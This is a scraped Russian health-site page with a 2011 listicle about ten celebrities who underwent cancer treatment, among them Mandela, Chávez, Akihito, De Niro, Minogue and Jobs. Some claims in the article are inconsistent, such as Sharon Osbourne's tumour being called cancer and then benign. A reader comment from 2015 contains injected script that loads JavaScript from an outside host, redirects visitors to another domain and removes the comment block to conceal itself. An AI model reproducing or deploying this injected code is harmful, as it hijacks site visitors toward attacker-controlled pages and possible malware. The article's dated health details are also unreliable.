Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 знаменитостей, выживши...  >>  10 знаменитостей, выживших после рака
 
Обратная связь
 

10 знаменитостей, выживших после рака

Размер шрифта
19 июля 2011 06:58
  • google_analytics: false
  • Нравится

В понедельник лауреат Нобелевской премии мира Нельсон Мандела отпраздновал свой 93-й год рождения. 67 лет жизни он посвятил борьбе с апартеидом. Героическую судьбу политика мог оборвать рак, который был обнаружен у Манделы в 1990 году. Благодаря стараниям врачей он излечился. Кто еще из знаменитостей смог победить рак?

 

Александр Тушкин / «Здоровье инфо»

Нельсон Мандела

/

Один из самых известных активистов в борьбе за права человека 27 лет отсидел в тюрьме. Нары сильно подкосили здоровье первого чернокожего президента ЮАР. Большая часть простаты у Манделы была удалена после того, как он вышел из тюрьмы в 1990 году. Однако опухоль метастазировала. В 2001 году ему был поставлен диагноз «микроскопическая» раковая опухоль. 83-летний Мандела перенес лучевую терапию. Процедура оказалась очень эффективной: в июле 2002 года политик заявил, что полностью излечился от рака.

Уго Чавес

На прошлой неделе глава Венесуэлы отправился в Бразилию, чтобы пройти там курс химиотерапии. 20 июня революционного лидера прооперировали на Кубе, где он находился с дружественным визитом. На Острове Свободы Чавес внезапно почувствовал себя плохо. Фидель Кастро посоветовал другу воспользоваться достижениями кубинской медицины. Врачи обнаружили у Чавеса злокачественную опухоль брюшной полости и удалили ее. «Во времена революции я не следил за своим здоровьем», – признался прессе бывший солдат.

Император Акихито

125-й император священной династии Японии, Его величество Император Акихито, один из потомков богини Аматэрасу не избежал участи простого смертного. В 2002 году врачи обнаружили у монаршей особы рак простаты. В начале 2003 года была проведена операцию по удалению опухоли, однако через год личный врач императора сообщил, что опухоль метастазировала. Монарху назначили курс уколов, что, впрочем, не мешало ему выполнять основные обязанности и участвовать в церемониях и принимать зарубежные делегации. Сейчас император чувствует себя хорошо: играет в теннис и занимается верховой ездой. В декабре Акихито отметит свой 78-й день рождения.

Роберт Де Ниро

Рак простаты был обнаружен у знаменитого актера в 2003 году во время планового осмотра. На тот момент любимцу публики было 60 лет. Врачи посулили быстрое излечение от рака, так как заболевание было диагностировано на ранней стадии, а сам актер был в хорошей физической форме. Актер выступил категорически против хирургического вмешательства. И в 2010 году после многочисленных процедур и курсов терапии «Бешеный бык» излечился от рака простаты. За время лечения Роберт Де Ниро сыграл главные роли в нескольких фильмах-блокбастерах, например, комедии «Знакомство с Факерами».

Кайли Миноуг

/

В 2005 году певица Кайли Миноуг была вынуждена отложить свое мировое турне. Тридцатишестилетней австралийке вынесли страшный приговор: рак молочной железы. «Когда врачи сообщили мне диагноз, я потеряла дар речи», — призналась Миноуг после перенесенной операции по удалению опухоли. Хирургического вмешательства оказалось мало, и врачи настояли на химиотерапии. Через полтора года Миноуг выздоровела, пришла в форму и возобновила карьеру, одновременно начав активную кампанию по борьбе с раком молочной железы.

Ричард Раундтри

Мы решили включить в наш рейтинг этого актера второго плана, так как в 1993 году врачи поставили ему редкий диагноз у мужчин «рак молочной железы», который встречается у 1 мужчины на 1000 человек. «Помню, как врач произнес слово «рак», и больше я ничего не слышал, сидел и ничего не понимал: пришел с недомоганием, и тут такое», – признался чернокожий актер в 2007 году. Раундтри подвергся мастэктомии и длительной химиотерапии. Лечение было удачным, и уже в 1994 году актер приступил к съемкам.

Анастейша Лин Ньюкирк

Американская певица Анастейша в январе 2003 года решила уменьшить грудь из-за проблем со спиной (массивная грудь приводит к тому, что женщина вынуждены наклоняться вперед). Обязательная перед каждой подобной операцией маммография показала, что у певицы рак груди. Она приняла незамедлительное решение лечь под нож хирурга, а затем пройти курс радиотерапии. Через некоторое время певица вернулась на сцену. Но ее третий альбом, который вышел после операции, провалился, и неудачу она объяснила проблемами со здоровьем. В 2005 году она основала «Фонд Анастейши», который помогает всем женщинам, заболевшим раком молочной железы.

Майкл Дуглас

Звезда фильмов «Игра» и «Уолл-стрит» в 2010 году был сражен страшным диагнозом – врачи обнаружили рак горла. Опухоль развилась у актера на фоне богемного образа жизни – обильные алкогольные возлияния и курение сделали свое дело. Актер признался прессе, что у него были только 80% шансов на выздоровление, так как диагноз был «не очень хороший». Врачи заставили Дугласа пройти процедуру химиотерапии. Из-за нее он потерял 14 кг. В начале этого года актер заявил, что поборол рак благодаря своим генам и теперь «ест как свинья».

Стив Джобс

/

57-летняя икона компьютерного бизнеса, генеральный директор корпорации Apple паркует свой мерседес на стоянке для инвалидов. Такое право Стив Джобс получил в 2009 году, когда перенес операцию по пересадке печени. Ранее в 2003 году врачи обнаружили у него редкую форму рака поджелудочной железы, которая в ином случае оказалась бы смертельной. В 2004 году хирурги медицинского центра при Стэнфордском институте вырезали опухоль, и с тех пор Стив балансирует на грани между жизнью и смертью. В декабре 2008 года появились слухи о его гибели, однако они были опровергнуты на официальном сайте компании самим Стивом. В начале этого года Стив взял отпуск «по состоянию здоровья» и последний раз показывался на публике в марте на презентации нового планшета – iPad 2.

Шэрон Осборн

Врачи поставили жене скандального рокера Оззи Осборна диагноз «рак толстой кишки» в 2002 году. «Когда доктор позвонил и сообщил, что у меня рак, я упала на пол и начала рыдать», – вспоминает Шэрон. Впрочем, опухоль оказалась доброкачественной, и уже в 2003 году Шэрон вернулась в шоу-бизнес. Она запустила свою программу по борьбе с раком кишечника, которая занимается поддержкой больных и их семей, а также пропагандой регулярных осмотров у врачей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диагностика и лечение с помощью света   Почему возникает рак   Новый тест скажет, будет у вас рак или нет   Восемь симптомов, на которые мужчины не обращают внимания  
18 октября 2012Новый тест скажет, будет у вас рак или нет 09 августа 2012Раковые клетки теперь не смогут скрыться!
 
03 июля 2012Созданы лекарства, которые обучают организм убивать рак 11 апреля 2013Каждая 30-я смерть от рака из-за водки
 

Слайдшоу

1
Супереда против рака
Продукты против рака
Факторы, которые влияют на возникновение рака

Тесты

1
Что вы знаете о раке груди?
Что вы знаете о раке груди?
Уход за полостью рта
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.